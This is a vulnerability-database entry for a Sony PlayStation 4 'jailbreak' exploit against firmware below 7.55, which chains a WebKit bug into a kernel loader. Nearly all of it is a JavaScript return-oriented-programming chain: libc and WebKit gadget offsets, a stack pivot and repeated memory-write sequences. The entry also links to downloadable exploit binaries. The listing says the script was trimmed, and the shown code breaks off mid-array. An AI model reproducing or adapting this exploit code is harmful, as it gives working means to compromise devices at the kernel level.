Details of VAR-E-202103-0190

Sign-up

ID

VAR-E-202103-0190

EDB ID

49664

TITLE

Sony Playstation 4 (PS4) < 7.55 - 'Jailbreak' Webkit / Kernel Loader 'SOCK_RAW' 'IP6_EXTHDR_CHECK'

Trust: 0.6

sources: EDBNET: 104142

AFFECTED PRODUCTS

vendor:

sony

model:

playstation

scope:

eq

version:

4<7.55

Trust: 0.6

sources: EDBNET: 104142

EXPLOIT

VARIoT low-db script: this entry was too long [over 1e6 characters] and had to be trimmed.

// EDB-Note: Download ~ https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/49664.zip

var ropchain_array = new Uint32Array(337302);
var ropchain = read_ptr_at(addrof(ropchain_array)+0x10);
var ropchain_offset = 2;
function set_gadget(val)
{
ropchain_array[ropchain_offset++] = val | 0;
ropchain_array[ropchain_offset++] = (val / 4294967296) | 0;
}
function set_gadgets(l)
{
for(var i = 0; i < l.length; i++)
set_gadget(l[i]);
}
function db(data)
{
for(var i = 0; i < data.length; i++)
ropchain_array[ropchain_offset++] = data[i];
}
var main_ret = malloc(8);
var printf_buf = malloc(65536);
var __swbuf_addr = 0; // STUB
set_gadgets([
libc_base+763368, //pop rcx
ropchain+65720, //rdi_bak
libc_base+533450, //mov [rcx], rdi
libc_base+144605, //pop rdi
ropchain+65680, //stack_bottom
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+759608, //pop rax
ropchain+112, //ret_addr
libc_base+426295, //mov [rdi], rax
libc_base+782311, //pop rsp
ropchain+1221872, //_main
//ret_addr:
libc_base+782311, //pop rsp
ropchain+65680 //stack_bottom
]);
//_ps4_printf_buffer:
var printf_buf_offset = 128;
set_gadget(printf_buf);
//_ps4_printf_fd:
db([4294967295, 4294967295]); // -0x1
//stack:
ropchain_offset += 16384;
//stack_bottom:
set_gadgets([
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
main_ret,
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//rdi_bak:
//_pivot_back_addr:
db([0, 0]); // 0x0
set_gadgets([
pivot_addr,
//___builtin_bswap16:
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+65800, //L1
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L1:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+65896, //L2
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+65928, //L5
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L2:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L4:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L5:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+66032, //L8
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+66016, //L6
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L6:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L8:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224144, //mov ax, [rdi]
libc_base+764760, //pop rsi
ropchain+66192, //L12
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+66160, //L10
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+66176, //L11
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L9:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L10:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L11:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L12:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+66248, //L14
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L14:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+66376, //L16
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+66392, //L17
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+66360, //L15
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L15:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L16:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L17:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+66552, //L21
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+66520, //L19
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+66536, //L20
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L18:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L19:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L20:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L21:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+66656, //L23
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+66640, //L22
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L22:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L23:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L24:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L25:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+66864, //L28
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+66848, //L27
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L26:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L27:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L28:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+66968, //L30
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+66952, //L29
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L29:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L30:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+67048, //L31
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L31:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L33:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+67168, //L36
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+67152, //L34
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L34:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L36:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224144, //mov ax, [rdi]
libc_base+764760, //pop rsi
ropchain+67328, //L40
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+67296, //L38
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+67312, //L39
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L37:
db([16, 0]); // 0x10
set_gadget(webkit_base+3236123,); //pop r9
//L38:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L39:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L40:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+764760, //pop rsi
ropchain+67384, //L42
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+144605 //pop rdi
]);
//L42:
db([0, 0]); // 0x0
set_gadgets([
libc_base+478984, //sar edi, cl
libc_base+764760, //pop rsi
ropchain+67512, //L44
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+67528, //L45
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+67496, //L43
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L43:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L44:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L45:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+67688, //L49
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+67656, //L47
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+67672, //L48
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L46:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L47:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L48:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L49:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+67792, //L51
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+67776, //L50
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L50:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L51:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L52:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L53:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+67992, //L56
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+67976, //L55
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L54:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L55:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L56:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+68096, //L58
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+68080, //L57
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L57:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L58:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+68208, //L61
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+68192, //L60
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L59:
db([48, 0]); // 0x30
set_gadget(webkit_base+3236123,); //pop r9
//L60:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L61:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+68272, //L63
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+763368 //pop rcx
]);
//L63:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+68328, //L64
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L64:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760, //pop rsi
ropchain+68480, //L67
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+68496, //L68
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+68464, //L66
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+3236123 //pop r9
]);
//L66:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L67:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L68:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+68608, //L69
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+68640, //L71
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+68624, //L70
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L69:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L70:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L71:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+68744, //L72
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+68760, //L73
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L72:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L73:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+68880, //L74
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+68864, //L75
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L75:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L74:
db([0, 0]); // 0x0
set_gadgets([
libc_base+764760, //pop rsi
ropchain+68968, //L77
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+68952, //L76
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L76:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L77:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+69072, //L78
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+69088, //L79
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+568675 //pop r8
]);
//L78:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L79:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+69208, //L80
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+69192, //L81
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+759608 //pop rax
]);
//L81:
db([0, 0]); // 0x0
set_gadget(libc_base+782311,); //pop rsp
//L80:
db([0, 0]); // 0x0
//___builtin_bswap32:
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+69280, //L83
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
webkit_base+568675 //pop r8
]);
//L83:
db([0, 0]); // 0x0
set_gadgets([
libc_base+426295, //mov [rdi], rax
libc_base+731401, //mov rax, r8
libc_base+764760, //pop rsi
ropchain+69376, //L84
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+69408, //L87
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+763368 //pop rcx
]);
//L84:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L86:
db([16, 0]); // 0x10
set_gadget(webkit_base+568675,); //pop r8
//L87:
db([0, 0]); // 0x0
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+69512, //L90
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+69496, //L88
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L88:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L90:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+69688, //L93
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+69704, //L94
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+69656, //L91
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+69672, //L92
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L91:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L92:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L93:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L94:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+69800, //L96
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+69784, //L95
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L95:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L96:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L97:
db([24, 0]); // 0x18
set_gadget(libc_base+763368,); //pop rcx
//L98:
db([24, 0]); // 0x18
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+70000, //L101
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+69984, //L100
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L99:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L100:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L101:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+70104, //L103
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+70088, //L102
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L102:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L103:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848080, //shr rax, cl
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+70192, //L104
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L104:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L106:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+70312, //L109
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+70296, //L107
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L107:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L109:
db([0, 0]); // 0x0
set_gadgets([
libc_base+224145, //mov eax, [rdi]
libc_base+764760, //pop rsi
ropchain+70488, //L112
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2002592, //mov rax, [rsi]
libc_base+764760, //pop rsi
ropchain+70504, //L113
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+384176, //mov rax, rdi
libc_base+764760, //pop rsi
ropchain+70456, //L110
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+70472, //L111
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L110:
db([0, 0]); // 0x0
set_gadget(webkit_base+3236123,); //pop r9
//L111:
db([0, 0]); // 0x0
set_gadget(libc_base+144605,); //pop rdi
//L112:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L113:
db([0, 0]); // 0x0
set_gadgets([
webkit_base+15691302, //movsxd rax, edi
libc_base+764760, //pop rsi
ropchain+70600, //L115
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+70584, //L114
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+144605 //pop rdi
]);
//L114:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L115:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L117:
db([16711680, 0]); // 0xff0000
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+70712, //L118
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L118:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+14664103, //and rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+759608 //pop rax
]);
//L120:
db([8, 0]); // 0x8
set_gadget(libc_base+763368,); //pop rcx
//L121:
db([8, 0]); // 0x8
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760 //pop rsi
]);
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+764760, //pop rsi
ropchain+70944, //L124
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+764760, //pop rsi
ropchain+70928, //L123
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L122:
db([32, 0]); // 0x20
set_gadget(webkit_base+3236123,); //pop r9
//L123:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L124:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848070, //shl rax, cl
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+71048, //L126
webkit_base+660161, //mov [rsi], rax ; mov al, 1
webkit_base+2757671, //mov rax, r9
libc_base+764760, //pop rsi
ropchain+71032, //L125
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+763368 //pop rcx
]);
//L125:
db([0, 0]); // 0x0
set_gadget(libc_base+759608,); //pop rax
//L126:
db([0, 0]); // 0x0
set_gadgets([
libc_base+848080, //shr rax, cl
libc_base+764760, //pop rsi
ropchain+71104, //L128
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L128:
db([0, 0]); // 0x0
set_gadgets([
libc_base+225585, //mov rax, [rdi]
libc_base+764760, //pop rsi
ropchain+71160, //L129
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+853989, //mov rax, rcx
libc_base+763368 //pop rcx
]);
//L129:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
db([4294967288, 4294967295]); // -0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
webkit_base+105700, //or rax, rcx
libc_base+764760 //pop rsi
]);
db([8, 0]); // 0x8
set_gadgets([
libc_base+201260, //sub rdi, rsi ; mov rdx, rdi
libc_base+426295, //mov [rdi], rax
libc_base+764760, //pop rsi
ropchain+71272, //L131
webkit_base+660161, //mov [rsi], rax ; mov al, 1
libc_base+731401, //mov rax, r8
libc_base+763368 //pop rcx
]);
//L131:
db([0, 0]); // 0x0
set_gadget(libc_base+764760,); //pop rsi
//L133:
db([16, 0]); // 0x10
set_gadgets([
libc_base+501454, //add rax, rsi
libc_base+764760, //pop rsi
ropchain+71392, //L136
